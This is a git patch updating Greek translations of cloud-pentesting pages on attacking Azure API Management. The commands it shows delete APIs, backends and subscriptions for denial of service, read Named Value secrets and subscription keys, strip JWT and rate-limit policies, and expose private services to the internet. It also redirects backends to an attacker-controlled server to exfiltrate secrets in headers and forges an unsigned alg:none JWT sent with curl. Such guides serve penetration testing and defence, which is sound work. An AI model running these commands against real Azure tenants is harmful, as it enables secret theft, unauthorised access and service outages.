From e996915cb7e3087ad9f48293018d7e25fe80c604 Mon Sep 17 00:00:00 2001 From: Translator Date: Fri, 26 Dec 2025 18:52:45 +0000 Subject: [PATCH] Translated ['', 'src/pentesting-cloud/azure-security/az-services/az-api- --- .../az-api-management-post-exploitation.md | 14 +++---- .../az-api-management-privesc.md | 42 +++++++++---------- .../az-services/az-api-management.md | 36 ++++++++-------- 3 files changed, 45 insertions(+), 47 deletions(-) diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md index f106c5b0a..0d51b4fab 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md @@ -3,7 +3,7 @@ {{#include ../../../banners/hacktricks-training.md}} ## `Microsoft.ApiManagement/service/apis/policies/write` or `Microsoft.ApiManagement/service/policies/write` -Ο επιτιθέμενος μπορεί να χρησιμοποιήσει πολλαπλά διανύσματα επίθεσης για να προκαλέσει denial of service. Για να μπλοκάρει νόμιμη κίνηση, ο επιτιθέμενος προσθέτει rate-limiting και quota policies με εξαιρετικά χαμηλές τιμές, εμποδίζοντας ουσιαστικά την κανονική πρόσβαση: +Ο attacker μπορεί να χρησιμοποιήσει πολλαπλά κανάλια για να προκαλέσει denial of service. Για να μπλοκάρει τη νόμιμη κυκλοφορία, ο attacker προσθέτει rate-limiting και quota policies με εξαιρετικά χαμηλές τιμές, εμποδίζοντας ουσιαστικά την κανονική πρόσβαση: ```bash az rest --method PUT \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service//apis//policies/policy?api-version=2024-05-01" \ @@ -15,7 +15,7 @@ az rest --method PUT \ } }' ``` -Για να αποκλείσει συγκεκριμένες νόμιμες διευθύνσεις IP πελατών, ο επιτιθέμενος μπορεί να προσθέσει πολιτικές φιλτραρίσματος IP που απορρίπτουν αιτήσεις από επιλεγμένες διευθύνσεις: +Για να αποκλείσει συγκεκριμένα νόμιμα client IPs, ο attacker μπορεί να προσθέσει IP filtering policies που απορρίπτουν αιτήματα από επιλεγμένες διευθύνσεις: ```bash az rest --method PUT \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service//apis//policies/policy?api-version=2024-05-01" \ @@ -27,8 +27,8 @@ az rest --method PUT \ } }' ``` -## `Microsoft.ApiManagement/service/backends/write` ή `Microsoft.ApiManagement/service/backends/delete` -Για να προκαλέσει αποτυχία των αιτήσεων, ο επιτιθέμενος μπορεί να τροποποιήσει μια διαμόρφωση backend και να αλλάξει το URL σε μια μη έγκυρη ή μη προσβάσιμη διεύθυνση: +## `Microsoft.ApiManagement/service/backends/write` or `Microsoft.ApiManagement/service/backends/delete` +Για να προκαλέσει αποτυχία στα requests, ο επιτιθέμενος μπορεί να τροποποιήσει μια διαμόρφωση backend και να αλλάξει το URL της σε μια μη έγκυρη ή μη προσβάσιμη διεύθυνση: ```bash az rest --method PUT \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service//backends/?api-version=2024-05-01" \ @@ -47,14 +47,14 @@ az rest --method DELETE \ --headers "If-Match=*" ``` ## `Microsoft.ApiManagement/service/apis/delete` -Για να καταστήσει κρίσιμες APIs μη διαθέσιμες, ο επιτιθέμενος μπορεί να τις διαγράψει απευθείας από την API Management service: +Για να καταστήσει κρίσιμα APIs μη διαθέσιμα, ο επιτιθέμενος μπορεί να τα διαγράψει απευθείας από την υπηρεσία API Management: ```bash az rest --method DELETE \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service//apis/?api-version=2024-05-01" \ --headers "If-Match=*" ``` ## `Microsoft.ApiManagement/service/write` or `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action` -Για να αποκλείσει την πρόσβαση από το Διαδίκτυο, ο επιτιθέμενος μπορεί να απενεργοποιήσει το public network access στο API Management service: +Για να αποκλείσει την πρόσβαση από το Διαδίκτυο, ο επιτιθέμενος μπορεί να απενεργοποιήσει το public network access στην API Management service: ```bash az rest --method PATCH \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service/?api-version=2024-05-01" \ @@ -66,7 +66,7 @@ az rest --method PATCH \ }' ``` ## `Microsoft.ApiManagement/service/subscriptions/delete` -Για να αποκλείσει την πρόσβαση νόμιμων χρηστών, ο επιτιθέμενος μπορεί να διαγράψει API Management subscriptions: +Για να αποκλείσει την πρόσβαση για νόμιμους χρήστες, ο επιτιθέμενος μπορεί να διαγράψει συνδρομές API Management: ```bash az rest --method DELETE \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service//subscriptions/?api-version=2024-05-01" \ diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md index 982c64f9b..fe823e715 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md @@ -4,7 +4,7 @@ ## `Microsoft.ApiManagement/service/namedValues/read` & `Microsoft.ApiManagement/service/namedValues/listValue/action` -Η επίθεση αφορά την πρόσβαση σε ευαίσθητα μυστικά που αποθηκεύονται σε Azure API Management Named Values, είτε με την άμεση ανάκτηση των τιμών των μυστικών είτε με την κατάχρηση δικαιωμάτων για την απόκτηση Key Vault–backed secrets μέσω managed identities. +Η επίθεση συνίσταται στην πρόσβαση σε ευαίσθητα μυστικά που αποθηκεύονται στα Azure API Management Named Values, είτε με απευθείας ανάκτηση των τιμών των μυστικών είτε με κατάχρηση δικαιωμάτων για την απόκτηση μυστικών που υποστηρίζονται από Key Vault μέσω managed identities. ```bash az apim nv show-secret --resource-group --service-name --named-value-id ``` @@ -14,21 +14,21 @@ az apim nv show-secret --resource-group --service-name /resourceGroups//providers/Microsoft.ApiManagement/service//subscriptions//listSecrets?api-version=2024-05-01" ``` -Η απάντηση περιλαμβάνει το κύριο κλειδί της συνδρομής (primaryKey) και το δευτερεύον κλειδί (secondaryKey). Με αυτά τα κλειδιά, ο επιτιθέμενος μπορεί να authenticate και να αποκτήσει πρόσβαση στα APIs που δημοσιεύονται μέσω του API Management Gateway: +Η απόκριση περιλαμβάνει το subscription primary key (primaryKey) και το secondary key (secondaryKey). Με αυτά τα κλειδιά, ο επιτιθέμενος μπορεί να authenticate και να αποκτήσει πρόσβαση στα APIs που δημοσιεύονται μέσω του API Management Gateway: ```bash curl -H "Ocp-Apim-Subscription-Key: " \ https://.azure-api.net/ ``` -Ο επιτιθέμενος μπορεί να έχει πρόσβαση σε όλα τα APIs και τα προϊόντα που σχετίζονται με τη συνδρομή. Εάν η συνδρομή έχει πρόσβαση σε ευαίσθητα προϊόντα ή APIs, ο επιτιθέμενος ενδέχεται να αποκτήσει εμπιστευτικές πληροφορίες ή να εκτελέσει μη εξουσιοδοτημένες ενέργειες. +Ο επιτιθέμενος μπορεί να έχει πρόσβαση σε όλες τις APIs και products που σχετίζονται με τη subscription. Εάν η subscription έχει πρόσβαση σε ευαίσθητα products ή APIs, ο επιτιθέμενος μπορεί να αποκτήσει εμπιστευτικές πληροφορίες ή να εκτελέσει μη εξουσιοδοτημένες ενέργειες. -## `Microsoft.ApiManagement/service/policies/write` or `Microsoft.ApiManagement/service/apis/policies/write` +## `Microsoft.ApiManagement/service/policies/write` ή `Microsoft.ApiManagement/service/apis/policies/write` -Ο επιτιθέμενος αρχικά ανακτά την τρέχουσα πολιτική του API: +Ο επιτιθέμενος αρχικά ανακτά την τρέχουσα πολιτική API: ```bash az rest --method GET \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service//apis//policies/?api-version=2024-05-01&format=rawxml" ``` -Ο επιτιθέμενος μπορεί να τροποποιήσει την πολιτική με πολλούς τρόπους ανάλογα με τους στόχους του. Για παράδειγμα, για να disable authentication, αν η πολιτική περιλαμβάνει JWT token validation, ο επιτιθέμενος μπορεί να αφαιρέσει ή να σχολιάσει εκείνο το τμήμα: +Ο επιτιθέμενος μπορεί να τροποποιήσει την policy με πολλούς τρόπους ανάλογα με τους στόχους του. Για παράδειγμα, για να απενεργοποιήσει τον έλεγχο ταυτότητας, εάν η policy περιλαμβάνει JWT token validation, ο επιτιθέμενος μπορεί να αφαιρέσει ή να σχολιάσει αυτήν την ενότητα: ```xml @@ -49,7 +49,7 @@ az rest --method GET \ ``` -Για να αφαιρέσει τους rate limiting ελέγχους και να επιτρέψει denial-of-service επιθέσεις, ο επιτιθέμενος μπορεί να αφαιρέσει ή να σχολιάσει τις quota και rate-limit πολιτικές: +Για να αφαιρεθούν οι έλεγχοι rate limiting και να επιτραπούν επιθέσεις denial-of-service, ο επιτιθέμενος μπορεί να αφαιρέσει ή να σχολιάσει τις πολιτικές quota και rate-limit: ```xml @@ -61,7 +61,7 @@ az rest --method GET \ ... ``` -Για να τροποποιήσετε τη διαδρομή του backend και να ανακατευθύνετε την κίνηση σε έναν server που ελέγχεται από τον επιτιθέμενο: +Για να τροποποιήσετε τη διαδρομή backend και να ανακατευθύνετε την κίνηση σε έναν διακομιστή ελεγχόμενο από τον επιτιθέμενο: ```xml ... @@ -84,33 +84,31 @@ az rest --method PUT \ } }' ``` -## Λανθασμένη διαμόρφωση επαλήθευσης JWT +## Λανθασμένη ρύθμιση επαλήθευσης JWT -Ο επιτιθέμενος πρέπει να γνωρίζει ότι ένα API χρησιμοποιεί επαλήθευση JWT token και ότι η πολιτική είναι λανθασμένα διαμορφωμένη. +Ο επιτιθέμενος πρέπει να γνωρίζει ότι ένα API χρησιμοποιεί επαλήθευση JWT token και ότι η πολιτική είναι λανθασμένα διαμορφωμένη. Κακώς διαμορφωμένες πολιτικές επαλήθευσης JWT μπορεί να περιέχουν `require-signed-tokens="false"` ή `require-expiration-time="false"`, που επιτρέπουν στην υπηρεσία να αποδέχεται unsigned tokens ή tokens που δεν λήγουν ποτέ. -Οι ελλιπώς διαμορφωμένες πολιτικές επαλήθευσης JWT ενδέχεται να έχουν `require-signed-tokens="false"` ή `require-expiration-time="false"`, πράγμα που επιτρέπει στην υπηρεσία να αποδέχεται unsigned tokens ή tokens that never expire. - -Ο επιτιθέμενος δημιουργεί ένα κακόβουλο JWT token χρησιμοποιώντας τον none αλγόριθμο (unsigned): +Ο επιτιθέμενος δημιουργεί ένα κακόβουλο JWT token χρησιμοποιώντας τον none algorithm (unsigned): ``` # Header: {"alg":"none"} # Payload: {"sub":"user"} eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0. ``` -Ο attacker στέλνει ένα αίτημα στο API χρησιμοποιώντας το malicious token: +Ο επιτιθέμενος στέλνει ένα αίτημα στο API χρησιμοποιώντας το κακόβουλο token: ```bash curl -X GET \ -H "Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0." \ https://.azure-api.net/path ``` -Εάν η πολιτική είναι λανθασμένα ρυθμισμένη με `require-signed-tokens="false"`, η υπηρεσία θα αποδεχθεί το μη υπογεγραμμένο token. Ο επιτιθέμενος μπορεί επίσης να δημιουργήσει ένα token χωρίς expiration claim αν `require-expiration-time="false"`. +Εάν η πολιτική έχει λανθασμένη διαμόρφωση με `require-signed-tokens="false"`, η υπηρεσία θα αποδεχτεί το μη υπογεγραμμένο token. Ο επιτιθέμενος μπορεί επίσης να δημιουργήσει ένα token χωρίς expiration claim αν `require-expiration-time="false"`. ## `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action` -Ο επιτιθέμενος ελέγχει πρώτα την τρέχουσα διαμόρφωση δικτύου της υπηρεσίας: +Ο επιτιθέμενος αρχικά ελέγχει την τρέχουσα διαμόρφωση δικτύου της υπηρεσίας: ```bash az rest --method GET \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service/?api-version=2024-05-01" ``` -Ο επιτιθέμενος ελέγχει την JSON απάντηση για να επαληθεύσει τις τιμές των `publicNetworkAccess` και `virtualNetworkType`. Αν το `publicNetworkAccess` είναι ορισμένο σε false ή το `virtualNetworkType` είναι ορισμένο σε Internal, η υπηρεσία έχει ρυθμιστεί για ιδιωτική πρόσβαση. +Ο επιτιθέμενος εξετάζει την JSON απάντηση για να επαληθεύσει τις τιμές των `publicNetworkAccess` και `virtualNetworkType`. Αν το `publicNetworkAccess` είναι false ή το `virtualNetworkType` ρυθμιστεί σε Internal, η υπηρεσία είναι διαμορφωμένη για ιδιωτική πρόσβαση. Για να εκθέσει την υπηρεσία στο Διαδίκτυο, ο επιτιθέμενος πρέπει να αλλάξει και τις δύο ρυθμίσεις. Αν η υπηρεσία τρέχει σε εσωτερική λειτουργία (`virtualNetworkType: "Internal"`), ο επιτιθέμενος την αλλάζει σε None ή External και ενεργοποιεί το `publicNetworkAccess`. Αυτό μπορεί να γίνει χρησιμοποιώντας το Azure Management API: ```bash @@ -124,10 +122,10 @@ az rest --method PATCH \ } }' ``` -Μόλις το `virtualNetworkType` οριστεί σε `None` ή `External` και το `publicNetworkAccess` είναι ενεργοποιημένο, η υπηρεσία και όλα τα APIs της γίνονται προσβάσιμα από το Internet, ακόμη κι αν προηγουμένως προστατεύονταν πίσω από ιδιωτικό δίκτυο ή private endpoints. +Μόλις το `virtualNetworkType` οριστεί σε `None` ή `External` και το `publicNetworkAccess` ενεργοποιηθεί, η υπηρεσία και όλα τα API της γίνονται προσβάσιμα από το Internet, ακόμα και αν προηγουμένως προστατεύονταν πίσω από ιδιωτικό δίκτυο ή private endpoints. ## `Microsoft.ApiManagement/service/backends/write` -Ο επιτιθέμενος αρχικά απαριθμεί τα υπάρχοντα backends για να εντοπίσει ποιο να τροποποιήσει: +Ο attacker αρχικά απαριθμεί τα υπάρχοντα backends για να εντοπίσει ποιο να τροποποιήσει: ```bash az rest --method GET \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service//backends?api-version=2024-05-01" @@ -137,7 +135,7 @@ az rest --method GET \ az rest --method GET \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service//backends/?api-version=2024-05-01" ``` -Ο επιτιθέμενος τροποποιεί το backend URL ώστε να δείχνει σε server υπό τον έλεγχό του. Πρώτα λαμβάνει το ETag από την προηγούμενη απάντηση και στη συνέχεια ενημερώνει το backend: +Ο επιτιθέμενος τροποποιεί το backend URL ώστε να δείχνει σε έναν server υπό τον έλεγχό του. Πρώτα λαμβάνει το ETag από την προηγούμενη απάντηση και στη συνέχεια ενημερώνει το backend: ```bash az rest --method PUT \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service//backends/?api-version=2024-05-01" \ @@ -150,7 +148,7 @@ az rest --method PUT \ } }' ``` -Εναλλακτικά, ο επιτιθέμενος μπορεί να διαμορφώσει τα backend headers για να exfiltrate Named Values που περιέχουν μυστικά. Αυτό γίνεται μέσω της backend credentials configuration: +Εναλλακτικά, ο επιτιθέμενος μπορεί να διαμορφώσει τα backend headers για να exfiltrate τα Named Values που περιέχουν secrets. Αυτό γίνεται μέσω της backend credentials configuration: ```bash az rest --method PUT \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service//backends/?api-version=2024-05-01" \ @@ -167,6 +165,6 @@ az rest --method PUT \ } }' ``` -Με αυτή τη διαμόρφωση, οι Named Values αποστέλλονται ως headers σε όλα τα requests προς τον attacker-controlled backend, επιτρέποντας την exfiltration ευαίσθητων secrets. +Με αυτή τη διαμόρφωση, Named Values αποστέλλονται ως headers σε όλα τα requests προς το attacker-controlled backend, επιτρέποντας την εξαγωγή ευαίσθητων secrets. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-services/az-api-management.md b/src/pentesting-cloud/azure-security/az-services/az-api-management.md index b6bfdbed3..d12e9b2ae 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-api-management.md +++ b/src/pentesting-cloud/azure-security/az-services/az-api-management.md @@ -2,43 +2,43 @@ {{#include ../../../banners/hacktricks-training.md}} -## Βασικές Πληροφορίες +## Basic Information -Azure API Management (APIM) είναι μια πλήρως διαχειριζόμενη υπηρεσία που προσφέρει μια **ενιαία πλατφόρμα για δημοσίευση, ασφάλιση, μετασχηματισμό, διαχείριση και παρακολούθηση APIs**. Επιτρέπει στις οργανώσεις να **εξομαλύνουν τη στρατηγική των API τους** και να διασφαλίζουν συνεπή διακυβέρνηση, απόδοση και ασφάλεια σε όλες τις υπηρεσίες τους. Λειτουργώντας ως ένα επίπεδο αφαίρεσης μεταξύ των backend υπηρεσιών και των καταναλωτών API, το APIM απλοποιεί την ενσωμάτωση και βελτιώνει τη συντηρησιμότητα ενώ παρέχει βασικές λειτουργίες επιχειρησιακής και ασφάλειας. +Azure API Management (APIM) είναι μια πλήρως διαχειριζόμενη υπηρεσία που προσφέρει μια **ενιαία πλατφόρμα για τη δημοσίευση, την ασφάλιση, τη μετατροπή, τη διαχείριση και την παρακολούθηση των API**. Επιτρέπει σε οργανισμούς να **κεντροποιήσουν τη στρατηγική API** τους και να διασφαλίσουν συνεπή διακυβέρνηση, απόδοση και ασφάλεια σε όλες τις υπηρεσίες τους. Λειτουργώντας ως επίπεδο αφαίρεσης μεταξύ backend υπηρεσιών και καταναλωτών API, το APIM απλοποιεί την ενσωμάτωση και βελτιώνει τη συντηρησιμότητα ενώ παρέχει βασικές λειτουργίες λειτουργίας και ασφάλειας. -## Κύριες Έννοιες +## Core Concepts -Η **Πύλη API** λειτουργεί ως το μοναδικό σημείο εισόδου για όλη την κίνηση API, διαχειριζόμενη λειτουργίες όπως δρομολόγηση αιτήσεων προς backend υπηρεσίες, επιβολή ορίων ρυθμού, προσωρινή αποθήκευση απαντήσεων και διαχείριση authentication και authorization. Αυτή η πύλη φιλοξενείται και διαχειρίζεται πλήρως από το Azure, εξασφαλίζοντας υψηλή διαθεσιμότητα και κλιμάκωση. +**Το API Gateway** λειτουργεί ως το μοναδικό σημείο εισόδου για όλη την κίνηση API, αναλαμβάνοντας λειτουργίες όπως δρομολόγηση αιτημάτων προς backend υπηρεσίες, επιβολή ορίων ρυθμού, caching απαντήσεων και διαχείριση authentication και authorization. Αυτό το gateway φιλοξενείται και διαχειρίζεται πλήρως από την Azure, εξασφαλίζοντας υψηλή διαθεσιμότητα και κλιμάκωση. -Η **Πύλη Προγραμματιστών** παρέχει ένα περιβάλλον self-service όπου οι καταναλωτές API μπορούν να ανακαλύψουν διαθέσιμα APIs, να διαβάσουν την τεκμηρίωση και να δοκιμάσουν endpoints. Βοηθά στην απλοποίηση της ένταξης παρέχοντας διαδραστικά εργαλεία και πρόσβαση σε πληροφορίες συνδρομής. +**Το Developer Portal** παρέχει ένα περιβάλλον self-service όπου οι καταναλωτές API μπορούν να ανακαλύψουν διαθέσιμα API, να διαβάσουν τεκμηρίωση και να δοκιμάσουν endpoints. Βοηθά στην απλοποίηση της εισαγωγής προσφέροντας διαδραστικά εργαλεία και πρόσβαση σε πληροφορίες συνδρομής. -Το **Πίνακας Διαχείρισης (Management Plane)** χρησιμοποιείται από διαχειριστές για να διαμορφώσουν και να συντηρήσουν την υπηρεσία APIM. Από εδώ, οι χρήστες μπορούν να ορίσουν APIs και operations, να διαμορφώσουν access control, να εφαρμόσουν πολιτικές, να διαχειριστούν χρήστες και να οργανώσουν τα APIs σε προϊόντα. Αυτός ο πίνακας κεντρικοποιεί τη διοίκηση και διασφαλίζει συνεπή διακυβέρνηση των API. +**Το Management Portal (Management Plane)** χρησιμοποιείται από διαχειριστές για τη ρύθμιση και τη συντήρηση της υπηρεσίας APIM. Από εδώ, οι χρήστες μπορούν να ορίζουν APIs και operations, να ρυθμίζουν τον έλεγχο πρόσβασης, να εφαρμόζουν policies, να διαχειρίζονται χρήστες και να οργανώνουν τα APIs σε προϊόντα. Αυτό το portal κεντροποιεί τη διαχείριση και διασφαλίζει συνεπή διακυβέρνηση API. ## Authentication and Authorization -Το Azure API Management υποστηρίζει αρκετούς μηχανισμούς **authentication** για την ασφάλεια της πρόσβασης στα API. Αυτοί περιλαμβάνουν **subscription keys**, **OAuth 2.0 tokens**, και **client certificates**. Το APIM επίσης ενσωματώνεται εγγενώς με την **Microsoft Entra ID**, επιτρέποντας **enterprise-level identity management** και **secure access** τόσο στα APIs όσο και στις backend υπηρεσίες. +Το Azure API Management υποστηρίζει διάφορους μηχανισμούς authentication για την προστασία της πρόσβασης στα API. Αυτοί περιλαμβάνουν **subscription keys**, **OAuth 2.0 tokens** και **client certificates**. Το APIM επίσης ενσωματώνεται εγγενώς με την **Microsoft Entra ID**, επιτρέποντας **διαχείριση ταυτοτήτων σε επιχειρησιακό επίπεδο** και **ασφαλή πρόσβαση** τόσο στα APIs όσο και στις backend υπηρεσίες. -## Πολιτικές +## Policies -Οι πολιτικές στο APIM επιτρέπουν στους διαχειριστές να προσαρμόσουν την **επεξεργασία αιτήσεων και απαντήσεων** σε διάφορα επίπεδα λεπτομέρειας, συμπεριλαμβανομένου του **service**, **API**, **operation**, ή **product** επιπέδου. Μέσω πολιτικών, είναι δυνατόν να εφαρμοστεί **JWT token validation**, **μετασχηματισμός XML ή JSON payloads**, **επιβολή rate limiting**, **περιορισμός κλήσεων ανά διεύθυνση IP**, ή **authentication έναντι backend υπηρεσιών χρησιμοποιώντας managed identities**. Οι πολιτικές είναι **πολύ ευέλικτες** και αποτελούν ένα από τα **βασικά πλεονεκτήματα** της πλατφόρμας API Management, επιτρέποντας **λεπτομερή έλεγχο της συμπεριφοράς κατά το runtime** χωρίς τροποποίηση του κώδικα του backend. +Τα policies στο APIM επιτρέπουν στους διαχειριστές να προσαρμόζουν την **επεξεργασία αιτημάτων και απαντήσεων** σε διάφορα επίπεδα, συμπεριλαμβανομένου του **service**, **API**, **operation** ή **product** επιπέδου. Μέσω των policies, είναι δυνατή η επιβολή **JWT token validation**, η **μετατροπή XML ή JSON payloads**, η **εφαρμογή rate limiting**, ο **περιορισμός κλήσεων κατά διεύθυνση IP**, ή η **authentication απέναντι σε backend υπηρεσίες χρησιμοποιώντας managed identities**. Τα policies είναι **πολύ ευέλικτα** και αποτελούν ένα από τα **βασικά πλεονεκτήματα** της πλατφόρμας API Management, επιτρέποντας **λεπτομερή έλεγχο της συμπεριφοράς χρόνου εκτέλεσης** χωρίς τροποποίηση του backend κώδικα. -## Ονομασμένες Τιμές +## Named Values -Η υπηρεσία παρέχει έναν μηχανισμό που ονομάζεται **Named Values**, ο οποίος επιτρέπει την αποθήκευση **πληροφοριών διαμόρφωσης** όπως **μυστικά**, **API keys**, ή άλλες τιμές που απαιτούνται από τις πολιτικές. +Η υπηρεσία παρέχει έναν μηχανισμό που ονομάζεται **Named Values**, ο οποίος επιτρέπει την αποθήκευση **πληροφοριών ρύθμισης** όπως **μυστικά**, **API keys** ή άλλων τιμών που απαιτούνται από policies. -Αυτές οι τιμές μπορούν να αποθηκευτούν απευθείας μέσα στο APIM ή να αναφερθούν με ασφάλεια από το **Azure Key Vault**. Οι Ονομασμένες Τιμές προάγουν την **ασφαλή και κεντρική διαχείριση** των δεδομένων διαμόρφωσης και απλοποιούν τη συγγραφή πολιτικών επιτρέποντας **επαναχρησιμοποιήσιμες αναφορές** αντί για hardcoded τιμές. +Αυτές οι τιμές μπορούν να αποθηκευτούν απευθείας μέσα στο APIM ή να αναφέρονται με ασφάλεια από το **Azure Key Vault**. Τα Named Values προάγουν τη **ασφαλή και κεντροποιημένη διαχείριση** των δεδομένων ρύθμισης και απλοποιούν τη συγγραφή policies επιτρέποντας **επαναχρησιμοποιήσιμες αναφορές** αντί για hardcoded τιμές. -## Δικτύωση και Ενσωμάτωση Ασφάλειας +## Networking and Security Integration -Το Azure API Management ενσωματώνεται απρόσκοπτα με **virtual network environments**, επιτρέποντας **ιδιωτική και ασφαλή συνδεσιμότητα** με backend συστήματα. +Το Azure API Management ενσωματώνεται ομαλά με **virtual network environments**, επιτρέποντας **ιδιωτική και ασφαλή συνδεσιμότητα** προς τα backend συστήματα. -Όταν αναπτύσσεται μέσα σε ένα **Virtual Network (VNet)**, το APIM μπορεί να έχει πρόσβαση σε **εσωτερικές υπηρεσίες** χωρίς να τις εκθέτει δημόσια. Η υπηρεσία επίσης επιτρέπει τη διαμόρφωση **custom certificates** για την υποστήριξη **mutual TLS authentication** με backend υπηρεσίες, βελτιώνοντας την ασφάλεια σε σενάρια όπου απαιτείται **ισχυρή επαλήθευση ταυτότητας**. +Όταν αναπτυχθεί μέσα σε ένα **Virtual Network (VNet)**, το APIM μπορεί να έχει πρόσβαση σε **εσωτερικές υπηρεσίες** χωρίς να τις εκθέτει δημόσια. Η υπηρεσία επιτρέπει επίσης τη ρύθμιση **custom certificates** για την υποστήριξη του **mutual TLS authentication** με backend υπηρεσίες, βελτιώνοντας την ασφάλεια σε σενάρια όπου απαιτείται **ισχυρή επαλήθευση ταυτότητας**. -Αυτές οι **δυνατότητες δικτύωσης** καθιστούν το APIM κατάλληλο τόσο για **cloud-native** όσο και για **hybrid αρχιτεκτονικές**. +Αυτές οι **δικτυακές δυνατότητες** καθιστούν το APIM κατάλληλο τόσο για **cloud-native** όσο και για **hybrid architectures**. -### Εντοπισμός +### Καταγραφή -Για να εντοπίσετε την υπηρεσία API management: +Για να καταγράψετε την υπηρεσία API Management: ```bash # Lists all Named Values configured in the Azure API Management instance az apim nv list --resource-group --service-name